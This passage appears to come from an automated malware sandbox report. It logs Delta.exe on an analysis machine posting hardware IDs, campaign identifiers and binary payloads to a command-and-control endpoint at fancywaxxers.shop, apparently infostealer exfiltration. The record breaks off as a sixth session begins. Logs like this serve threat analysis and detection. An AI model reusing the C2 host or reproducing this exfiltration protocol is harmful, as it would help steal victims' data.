2024-12-31 16:21:16 UTC	1369	IN	Data Raw: 59 55 4e 78 49 2f 2b 39 77 6e 45 36 42 74 45 4d 36 2b 31 6f 59 38 4c 50 49 69 38 39 4b 6f 50 65 71 68 45 79 46 42 7a 38 2b 71 51 43 6b 30 41 58 7a 6c 6c 6a 52 42 70 47 70 61 6d 2f 53 66 77 57 34 6c 35 47 75 6d 6c 49 63 32 7a 62 77 44 4e 56 79 49 31 2b 4a 55 59 54 34 49 50 37 7a 53 50 56 79 75 62 6c 69 65 38 64 43 4c 49 43 54 36 4a 76 76 62 71 69 6a 73 6f 68 55 73 52 63 50 61 72 45 41 6c 4e 51 42 33 37 35 68 2b 48 65 64 6d 53 4e 61 6d 6e 37 6f 6a 4c 66 77 6f 36 4a 53 2f 64 50 33 73 48 79 73 4b 6b 49 69 67 51 79 45 32 43 48 50 76 6d 6a 39 66 71 57 5a 56 6e 2f 62 58 6e 53 38 6d 39 43 72 77 32 36 45 2b 34 61 6b 63 49 45 37 4f 78 2b 77 44 59 54 34 63 50 37 7a 53 45 58 53 53 49 33 47 73 76 73 44 42 4e 32 4c 37 4a 37 36 4d 34 44 62 6e 6f 42 41 6f 54 4d 48 45 70 Data Ascii: YUNxI/+9wnE6BtEM6+1oY8LPIi89KoPeqhEyFBz8+qQCk0AXzlljRBpGpam/SfwW4l5GumlIc2zbwDNVyI1+JUYT4IP7zSPVyublie8dCLICT6JvvbqijsohUsRcParEAlNQB375h+HedmSNamn7ojLfwo6JS/dP3sHysKkIigQyE2CHPvmj9fqWZVn/bXnS8m9Crw26E+4akcIE7Ox+wDYT4cP7zSEXSSI3GsvsDBN2L7J76M4DbnoBAoTMHEp
2024-12-31 16:21:16 UTC	1369	IN	Data Raw: 4f 64 4f 43 52 4f 6c 61 6f 59 46 47 51 37 4e 69 47 50 43 7a 78 4a 50 62 63 71 54 76 67 71 52 55 68 52 73 4c 4a 71 30 4d 76 4d 55 51 78 70 4a 55 6d 45 2f 38 68 63 59 62 6c 7a 5a 6b 6a 41 2f 45 6b 76 73 76 75 49 36 53 72 46 47 63 53 69 4d 47 2b 53 53 77 72 44 58 6a 71 6e 54 31 42 70 6d 78 62 68 50 6e 51 69 79 6b 75 2b 69 54 34 31 61 55 77 36 4b 73 64 4c 45 58 45 69 4f 49 4e 4a 69 46 45 4a 36 53 38 4e 55 43 77 59 6c 36 64 36 4d 54 50 4d 57 7a 6c 61 2f 6e 59 34 47 4b 6b 72 78 4d 73 54 73 6a 45 72 45 6b 73 4f 52 5a 77 34 35 55 33 57 4c 56 72 56 35 48 31 31 34 51 68 4a 4f 34 6e 38 4d 61 6c 4b 50 62 73 56 6d 64 4e 30 49 6a 30 44 52 63 2b 46 47 2f 6e 30 41 39 46 70 48 64 62 6d 2f 4b 66 6b 47 41 37 76 43 7a 79 6c 50 68 36 34 71 4d 52 4a 45 58 4a 77 61 42 41 4a 44 Data Ascii: OdOCROlaoYFGQ7NiGPCzxJPbcqTvgqRUhRsLJq0MvMUQxpJUmE/8hcYblzZkjA/EkvsvuI6SrFGcSiMG+SSwrDXjqnT1BpmxbhPnQiyku+iT41aUw6KsdLEXEiOINJiFEJ6S8NUCwYl6d6MTPMWzla/nY4GKkrxMsTsjErEksORZw45U3WLVrV5H114QhJO4n8MalKPbsVmdN0Ij0DRc+FG/n0A9FpHdbm/KfkGA7vCzylPh64qMRJEXJwaBAJD
2024-12-31 16:21:16 UTC	1369	IN	Data Raw: 71 6a 56 64 6c 57 4a 4c 31 75 47 52 6c 6d 34 6c 38 47 75 6d 6c 4b 4d 39 35 36 30 53 4c 6b 62 48 7a 36 68 66 4b 7a 34 57 66 75 57 5a 4d 31 2b 6e 62 46 32 63 2f 39 61 43 49 69 2f 37 4c 50 48 52 34 48 53 6b 71 77 42 6e 45 6f 6a 70 6f 55 59 74 59 6c 34 2f 2b 39 77 6e 45 36 42 74 45 4d 36 2b 33 34 55 72 4b 50 45 6f 38 64 65 79 4f 2b 4b 2b 47 43 70 41 32 73 4b 6e 53 43 77 30 43 58 7a 69 6c 44 56 66 74 57 68 51 6c 66 57 66 77 57 34 6c 35 47 75 6d 6c 49 4d 74 38 71 59 66 4b 31 7a 44 79 61 39 62 4c 43 6c 45 4d 61 53 44 4f 55 4c 6e 4f 55 61 47 36 64 69 51 59 44 75 38 4c 50 4b 55 2b 48 72 69 70 52 34 67 54 4d 62 61 71 55 73 75 4e 67 31 32 34 4a 6f 39 55 36 4e 6c 56 35 50 39 30 34 51 70 49 66 4d 76 39 39 71 70 4e 61 54 69 57 43 42 53 69 4a 44 73 62 44 6f 36 43 48 4b Data Ascii: qjVdlWJL1uGRlm4l8GumlKM9560SLkbHz6hfKz4WfuWZM1+nbF2c/9aCIi/7LPHR4HSkqwBnEojpoUYtYl4/+9wnE6BtEM6+34UrKPEo8deyO+K+GCpA2sKnSCw0CXzilDVftWhQlfWfwW4l5GumlIMt8qYfK1zDya9bLClEMaSDOULnOUaG6diQYDu8LPKU+HripR4gTMbaqUsuNg124Jo9U6NlV5P904QpIfMv99qpNaTiWCBSiJDsbDo6CHK
2024-12-31 16:21:16 UTC	268	IN	Data Raw: 4b 34 68 48 74 62 35 78 38 39 32 59 74 77 67 36 4e 47 6e 4c 4b 61 5a 47 79 6c 45 7a 39 37 73 55 68 35 33 52 48 44 2b 30 6d 5a 71 76 69 46 58 6d 72 36 48 7a 7a 73 6c 2f 43 7a 6b 77 71 63 32 39 61 63 56 4b 32 6a 48 7a 37 70 4f 4c 6a 6f 56 64 71 69 5a 4d 78 50 70 49 56 65 4f 76 6f 66 50 41 53 58 71 4b 4e 48 58 73 54 4f 6b 34 6c 67 67 58 49 69 51 37 48 4e 68 4b 77 64 76 35 35 30 76 62 65 63 35 53 61 69 2b 31 4a 6b 70 4d 76 38 39 39 64 6d 73 4b 39 72 73 51 48 4d 59 6d 70 72 2b 48 7a 35 35 47 30 43 71 30 6a 38 54 2f 31 68 4a 31 75 69 66 31 33 78 73 76 44 6d 2b 6a 4f 42 39 35 37 34 4b 49 55 6e 65 79 2b 74 7a 48 78 34 53 64 65 4f 43 4f 55 53 6f 49 52 37 57 38 5a 2f 58 46 32 4c 31 4c 4f 58 46 74 6a 66 30 71 31 67 59 42 49 6a 51 37 42 56 68 44 41 64 78 36 70 55 6f Data Ascii: K4hHtb5x892Ytwg6NGnLKaZGylEz97sUh53RHD+0mZqviFXmr6Hzzsl/Czkwqc29acVK2jHz7pOLjoVdqiZMxPpIVeOvofPASXqKNHXsTOk4lggXIiQ7HNhKwdv550vbec5Sai+1JkpMv899dmsK9rsQHMYmpr+Hz55G0Cq0j8T/1hJ1uif13xsvDm+jOB9574KIUney+tzHx4SdeOCOUSoIR7W8Z/XF2L1LOXFtjf0q1gYBIjQ7BVhDAdx6pUo
2024-12-31 16:21:16 UTC	1369	IN	Data Raw: 32 63 65 39 0d 0a 35 4c 62 78 6c 76 74 4c 67 59 72 66 69 57 43 4e 62 69 4a 44 38 48 33 70 73 56 79 69 30 77 43 45 64 76 69 46 47 31 71 61 4e 77 57 34 77 76 48 4f 2b 6b 36 4d 6f 39 71 6f 62 4d 55 6d 50 39 70 4a 71 4f 7a 51 43 61 50 57 73 41 46 53 39 62 46 61 42 37 35 4f 61 4c 53 7a 79 4c 4f 69 55 37 6e 72 72 37 45 41 65 43 6f 43 49 6b 77 4e 68 49 55 51 6e 70 4b 63 39 58 61 6c 6d 52 6f 65 7a 2b 4a 55 6a 4a 4f 73 36 76 70 72 67 50 4b 54 30 53 6d 6b 4b 7a 4e 6e 73 46 58 46 72 58 79 71 33 78 57 34 42 75 43 39 4a 31 75 69 66 31 33 78 73 76 44 6d 2b 6a 4f 42 39 35 37 34 4b 49 55 6e 65 79 2b 74 7a 48 78 63 44 65 65 47 56 4c 68 47 4a 61 6b 53 52 76 70 48 50 49 57 4b 6b 45 72 36 63 34 41 57 71 37 41 42 6e 45 6f 6a 39 72 30 4d 76 50 68 4a 75 71 62 77 35 56 61 4a 6d Data Ascii: 2ce95LbxlvtLgYrfiWCNbiJD8H3psVyi0wCEdviFG1qaNwW4wvHO+k6Mo9qobMUmP9pJqOzQCaPWsAFS9bFaB75OaLSzyLOiU7nrr7EAeCoCIkwNhIUQnpKc9XalmRoez+JUjJOs6vprgPKT0SmkKzNnsFXFrXyq3xW4BuC9J1uif13xsvDm+jOB9574KIUney+tzHxcDeeGVLhGJakSRvpHPIWKkEr6c4AWq7ABnEoj9r0MvPhJuqbw5VaJm
2024-12-31 16:21:16 UTC	1369	IN	Data Raw: 33 50 64 6d 4b 37 4b 4f 7a 47 70 6a 6e 79 72 31 38 5a 64 4f 2f 47 71 30 77 33 4b 52 4e 77 32 71 77 72 55 4b 6c 76 56 34 44 76 6e 38 46 75 4c 62 78 7a 78 35 54 6f 65 74 76 69 57 44 38 4b 6b 49 69 5a 54 69 38 33 41 32 6e 31 33 78 6c 64 6f 47 42 47 68 75 6e 51 7a 32 42 69 2b 6d 75 6d 68 75 35 36 34 4c 31 59 66 78 71 61 6b 2f 6b 65 64 6d 6c 57 59 4b 71 4c 66 6b 58 6e 4f 51 4c 59 76 73 33 50 64 6d 4b 37 4b 4f 7a 47 70 6a 6e 79 72 31 38 5a 64 4f 2f 47 71 30 77 33 4b 52 4e 77 71 37 77 49 63 70 6c 66 52 5a 58 77 30 59 67 34 4d 37 78 6c 76 74 76 67 59 74 33 73 55 47 64 31 68 6f 69 30 44 58 6c 35 4d 58 7a 71 6e 44 6c 46 74 69 78 33 6d 50 6e 65 6d 54 34 31 38 32 54 51 34 6f 46 36 71 75 77 65 5a 78 4b 61 68 75 78 4a 4d 48 6c 63 4c 37 62 4a 61 77 44 77 4d 51 4b 4a 73 Data Ascii: 3PdmK7KOzGpjnyr18ZdO/Gq0w3KRNw2qwrUKlvV4Dvn8FuLbxzx5ToetviWD8KkIiZTi83A2n13xldoGBGhunQz2Bi+mumhu564L1Yfxqak/kedmlWYKqLfkXnOQLYvs3PdmK7KOzGpjnyr18ZdO/Gq0w3KRNwq7wIcplfRZXw0Yg4M7xlvtvgYt3sUGd1hoi0DXl5MXzqnDlFtix3mPnemT4182TQ4oF6quweZxKahuxJMHlcL7bJawDwMQKJs

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	104.21.96.1	443	7396	C:\Users\user\Desktop\Delta.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:21:17 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Y1RVV8N9OI1NTO User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18143 Host: fancywaxxers.shop
2024-12-31 16:21:17 UTC	15331	OUT	Data Raw: 2d 2d 59 31 52 56 56 38 4e 39 4f 49 31 4e 54 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 32 37 46 32 32 44 41 42 42 33 37 44 45 36 38 30 46 43 31 30 33 43 45 43 46 43 33 41 31 33 0d 0a 2d 2d 59 31 52 56 56 38 4e 39 4f 49 31 4e 54 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 31 52 56 56 38 4e 39 4f 49 31 4e 54 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 39 31 34 35 31 30 39 38 30 0d 0a 2d 2d 59 31 52 56 Data Ascii: --Y1RVV8N9OI1NTOContent-Disposition: form-data; name="hwid"0227F22DABB37DE680FC103CECFC3A13--Y1RVV8N9OI1NTOContent-Disposition: form-data; name="pid"2--Y1RVV8N9OI1NTOContent-Disposition: form-data; name="lid"yau6Na--914510980--Y1RV
2024-12-31 16:21:17 UTC	2812	OUT	Data Raw: cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f Data Ascii: d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wE
2024-12-31 16:21:17 UTC	1139	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:21:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=j9bo1vttghhssh1dcef8gjnqrf; expires=Sat, 26 Apr 2025 10:07:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vr3MzMO%2FWaNiE2wzRF%2FV0kYLu9YNoiRtvgt2KfIOZrR%2BncP7bbHHss8Pt4lUQLNpgaVA3nBKLadOMRC5J4FxE%2BHjUhNr%2FEakEWb7jWr6kzmsCkVRoZ9L21Y8fr6%2FJlgVRca4hQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fab9a0e5aa11a48-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1996&min_rtt=1993&rtt_var=754&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2844&recv_bytes=19102&delivery_rate=1446260&cwnd=157&unsent_bytes=0&cid=e0856b5389ae8d3d&ts=672&x=0"
2024-12-31 16:21:17 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 16:21:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	104.21.96.1	443	7396	C:\Users\user\Desktop\Delta.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:21:18 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=NF7LH923VBKDH6VCEB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8788 Host: fancywaxxers.shop
2024-12-31 16:21:18 UTC	8788	OUT	Data Raw: 2d 2d 4e 46 37 4c 48 39 32 33 56 42 4b 44 48 36 56 43 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 32 37 46 32 32 44 41 42 42 33 37 44 45 36 38 30 46 43 31 30 33 43 45 43 46 43 33 41 31 33 0d 0a 2d 2d 4e 46 37 4c 48 39 32 33 56 42 4b 44 48 36 56 43 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 46 37 4c 48 39 32 33 56 42 4b 44 48 36 56 43 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 39 31 34 35 31 Data Ascii: --NF7LH923VBKDH6VCEBContent-Disposition: form-data; name="hwid"0227F22DABB37DE680FC103CECFC3A13--NF7LH923VBKDH6VCEBContent-Disposition: form-data; name="pid"2--NF7LH923VBKDH6VCEBContent-Disposition: form-data; name="lid"yau6Na--91451
2024-12-31 16:21:18 UTC	1132	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:21:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gbk3qs8hkatp5jeso42el6f2gq; expires=Sat, 26 Apr 2025 10:07:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rxd%2BN7fNdZ22LS%2Bwbq5J9xYDaOGHGfdHkYoJ8s3hqxBpguHYCohvaTL0Rm5YK1LNEo5Xo3KcKvP%2BrVzlC7voHUrl5yP25nMxJ6VVxBeX08ILJ9CMXosr36YQXgPvgq9aY6e8Tw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fab9a1698f042c0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1662&min_rtt=1659&rtt_var=628&sent=10&recv=15&lost=0&retrans=0&sent_bytes=2843&recv_bytes=9728&delivery_rate=1733966&cwnd=212&unsent_bytes=0&cid=91a0ed7cbbffbdb5&ts=583&x=0"
2024-12-31 16:21:18 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 16:21:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	104.21.96.1	443	7396	C:\Users\user\Desktop\Delta.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:21:19 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=VRRPKLD6B8VDDDLB5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20435 Host: fancywaxxers.shop
2024-12-31 16:21:19 UTC	15331	OUT	Data Raw: 2d 2d 56 52 52 50 4b 4c 44 36 42 38 56 44 44 44 4c 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 32 37 46 32 32 44 41 42 42 33 37 44 45 36 38 30 46 43 31 30 33 43 45 43 46 43 33 41 31 33 0d 0a 2d 2d 56 52 52 50 4b 4c 44 36 42 38 56 44 44 44 4c 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 56 52 52 50 4b 4c 44 36 42 38 56 44 44 44 4c 42 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 39 31 34 35 31 30 39 38 Data Ascii: --VRRPKLD6B8VDDDLB5Content-Disposition: form-data; name="hwid"0227F22DABB37DE680FC103CECFC3A13--VRRPKLD6B8VDDDLB5Content-Disposition: form-data; name="pid"3--VRRPKLD6B8VDDDLB5Content-Disposition: form-data; name="lid"yau6Na--91451098
2024-12-31 16:21:19 UTC	5104	OUT	Data Raw: 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-12-31 16:21:20 UTC	1133	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:21:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vteo4t62g144m3bidvrr1fkajl; expires=Sat, 26 Apr 2025 10:07:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SW6QPeI5vEBBGtQ2T%2FJ8tnFD0GzdviJ0ekZMXO1NDisOCvKbK7CwAVx5dH3frL%2Fah%2Fr8wnA6zNg1QuQB4RtLMaXU8KLTg3JlJoqXJw0yb4vJO4PuGCZxCtJO2CBtQI1VnM1ZoA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fab9a1e0aa772a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2047&min_rtt=2045&rtt_var=771&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21397&delivery_rate=1415414&cwnd=212&unsent_bytes=0&cid=2f87fdd9de485db5&ts=680&x=0"
2024-12-31 16:21:20 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 16:21:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	104.21.96.1	443	7396	C:\Users\user\Desktop\Delta.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:21:21 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=NOJU2OM03 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1210 Host: fancywaxxers.shop
2024-12-31 16:21:21 UTC	1210	OUT	Data Raw: 2d 2d 4e 4f 4a 55 32 4f 4d 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 32 37 46 32 32 44 41 42 42 33 37 44 45 36 38 30 46 43 31 30 33 43 45 43 46 43 33 41 31 33 0d 0a 2d 2d 4e 4f 4a 55 32 4f 4d 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 4f 4a 55 32 4f 4d 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 39 31 34 35 31 30 39 38 30 0d 0a 2d 2d 4e 4f 4a 55 32 4f 4d 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d Data Ascii: --NOJU2OM03Content-Disposition: form-data; name="hwid"0227F22DABB37DE680FC103CECFC3A13--NOJU2OM03Content-Disposition: form-data; name="pid"1--NOJU2OM03Content-Disposition: form-data; name="lid"yau6Na--914510980--NOJU2OM03Content-
2024-12-31 16:21:21 UTC	1132	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:21:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ci6t4ope86q5eibqoq81aflhav; expires=Sat, 26 Apr 2025 10:08:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RZQ3Ov%2FtUrCJ2YSPsPcJgHh725nagCDi1%2FNFfffs2xDpssbiLsE7dusCN1WVPnhye8ZZ5ZveuaPS9PrzPKrYdP%2Bko8LM5aqU4GrNKsXZpeH5dk%2FYRdZc7Pw0nAkNdpcMd1ip9Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fab9a271e3572a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=2017&rtt_var=761&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2119&delivery_rate=1432777&cwnd=212&unsent_bytes=0&cid=4a6f67fecb2d087b&ts=462&x=0"
2024-12-31 16:21:21 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-31 16:21:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	104.21.96.1	443	7396	C:\Users\user\Desktop\Delta.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:21:22 UTC	283	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=G2X9029E03VFYHYSC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 549515 Host: fancywaxxers.shop
